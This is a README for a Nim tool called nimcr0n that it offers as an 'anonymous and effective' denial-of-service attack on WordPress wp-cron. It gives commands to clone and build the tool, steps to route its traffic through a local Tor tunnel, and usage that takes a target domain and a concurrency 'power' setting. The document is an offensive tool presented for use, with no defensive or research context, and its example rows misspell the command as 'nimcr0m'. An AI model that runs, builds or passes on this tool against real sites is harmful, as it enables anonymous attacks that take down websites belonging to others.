Anonymous and Effective wp-cron DOS using Nim.
git clone https://github.com/ncryptsion/nimcr0n.git
nim c -d:ssl -o:nimcr0n index
In order for Nimcr0n to properly function, you need to ensure Tor is running from port 9080.
sudo apt update && sudo apt install tor -y && sudo systemctl start tor
- Visit https://www.torproject.org/download/tor/
- Download the Tor Expert Bundle.
- Run the Tor with HTTPTunnelPort.
tor --HTTPTunnelPort 9080
nimcr0n <domain> <concurrent>
| Argument | Description | Example |
|---|---|---|
| domain | The target website domain. | nimcr0m example.ph <concurrent> |
| concurrent | The power or concurrent for Nimcr0n. | nimcr0m example.ph 100 |
This project is distributed under MIT License